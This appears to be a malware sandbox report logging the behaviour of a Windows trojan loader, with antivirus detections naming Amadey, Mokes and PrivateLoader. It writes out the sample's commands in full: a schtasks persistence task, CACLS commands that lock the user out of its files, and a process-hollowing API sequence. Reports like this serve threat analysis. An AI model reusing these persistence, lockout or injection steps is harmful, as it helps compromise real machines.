cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:R" /E
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1932
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 1932
1 0 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 1932
1 0 0

NtResumeThread

 thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 1932
1 0 0

CreateProcessInternalW

 thread_identifier: 2148
thread_handle: 0x0000039c
process_identifier: 2144
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\ss41.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\ss41.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\ss41.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003a4
1 1 0

NtResumeThread

 thread_handle: 0x0000033c
suspend_count: 1
process_identifier: 1932
1 0 0

CreateProcessInternalW

 thread_identifier: 2192
thread_handle: 0x000003a4
process_identifier: 2188
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\2a344302.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\2a344302.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\2a344302.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003bc
1 1 0

NtResumeThread

 thread_handle: 0x00000390
suspend_count: 1
process_identifier: 1932
1 0 0

CreateProcessInternalW

 thread_identifier: 2240
thread_handle: 0x000003ac
process_identifier: 2236
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\newplayer.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\newplayer.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\newplayer.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d4
1 1 0

CreateProcessInternalW

 thread_identifier: 2372
thread_handle: 0x000002e4
process_identifier: 2368
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002ec
1 1 0

NtResumeThread

 thread_handle: 0x00000234
suspend_count: 1
process_identifier: 2368
1 0 0

CreateProcessInternalW

 thread_identifier: 2432
thread_handle: 0x00000258
process_identifier: 2428
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000260
1 1 0

CreateProcessInternalW

 thread_identifier: 2496
thread_handle: 0x00000258
process_identifier: 2492
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000268
1 1 0

CreateProcessInternalW

 thread_identifier: 2232
thread_handle: 0x000003b4
process_identifier: 2180
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003dc
1 1 0

CreateProcessInternalW

 thread_identifier: 2396
thread_handle: 0x00000360
process_identifier: 2400
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003e0
1 1 0

CreateProcessInternalW

 thread_identifier: 2260
thread_handle: 0x00000350
process_identifier: 2284
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003dc
1 1 0

CreateProcessInternalW

 thread_identifier: 2572
thread_handle: 0x0000008c
process_identifier: 2568
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2608
thread_handle: 0x00000088
process_identifier: 2604
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "oneetx.exe" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2700
thread_handle: 0x0000008c
process_identifier: 2696
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "oneetx.exe" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2756
thread_handle: 0x0000008c
process_identifier: 2752
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

 thread_identifier: 2792
thread_handle: 0x00000094
process_identifier: 2788
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\207aa4515d" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2848
thread_handle: 0x0000008c
process_identifier: 2844
current_directory: C:\Users\test22\AppData\Local\Temp\207aa4515d
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\207aa4515d" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

NtResumeThread

 thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 2604
1 0 0

NtResumeThread

 thread_handle: 0x0000009c
suspend_count: 1
process_identifier: 2696
1 0 0

NtResumeThread

 thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 2788
1 0 0

NtResumeThread

 thread_handle: 0x00000098
suspend_count: 1
process_identifier: 2844
1 0 0

CreateProcessInternalW

 thread_identifier: 2512
thread_handle: 0x000000a4
process_identifier: 2508
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000000a8
1 1 0

NtGetContextThread

 thread_handle: 0x000000a4
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 2508
process_handle: 0x000000a8
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2508
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000000a8
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2508
process_handle: 0x000000a8
1 1 0

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000a4
process_identifier: 2508
1 0 0

NtResumeThread

 thread_handle: 0x000000a4
suspend_count: 1
process_identifier: 2508
1 0 0
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Generic.4!c
MicroWorld-eScan IL:Trojan.MSILZilla.9891
FireEye Generic.mg.8a06751312436a70
CAT-QuickHeal Backdoor.MsilFC.S22017452
ALYac IL:Trojan.MSILZilla.9891
Malwarebytes Trojan.Crypt.MSIL.Generic
Sangfor Trojan.Win32.Save.a
Alibaba TrojanDownloader:MSIL/Mokes.01695d55
CrowdStrike win/malicious_confidence_100% (W)
Arcabit IL:Trojan.MSILZilla.D26A3
BitDefenderTheta Gen:NN.ZemsilF.36250.bn0@aG3cpok
Cyren W32/MSIL_Kryptik.FFY.gen!Eldorado
Symantec Scr.Malcode!gdn33
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Agent.UZA
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Downloader.MSIL.ShortLoader.gen
BitDefender IL:Trojan.MSILZilla.9891
Avast Win32:DropperX-gen [Drp]
Tencent Msil.Trojan-Downloader.Shortloader.Szfl
Emsisoft IL:Trojan.MSILZilla.9891 (B)
F-Secure Heuristic.HEUR/AGEN.1357339
DrWeb Trojan.MulDropNET.43
VIPRE IL:Trojan.MSILZilla.9891
TrendMicro Trojan.Win32.PRIVATELOADER.YXDFLZ
McAfee-GW-Edition BehavesLike.Win32.Generic.tc
Trapmine malicious.moderate.ml.score
Sophos Troj/ILAgent-I
SentinelOne Static AI - Malicious PE
Webroot W32.Trojan.Gen
Avira HEUR/AGEN.1357339
Gridinsoft Trojan.Win32.Amadey.bot
Microsoft Trojan:MSIL/Mokes.B!MTB
ViRobot Trojan.Win.Z.Agent.1076736
ZoneAlarm HEUR:Trojan-Downloader.MSIL.ShortLoader.gen
GData Win32.Trojan-Downloader.Amadey.D0N84E
Google Detected
AhnLab-V3 Malware/Win.Generic.C4478643
Acronis suspicious
McAfee GenericRXOO-YN!8A0675131243
MAX malware (ai score=80)
VBA32 Trojan.MSIL.Injector.gen
Cylance unsafe
Panda Trj/GdSda.A
TrendMicro-HouseCall Trojan.Win32.PRIVATELOADER.YXDFLZ
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
Ikarus Trojan.MSIL.Krypt
Fortinet MSIL/GenKryptik.FFMZ!tr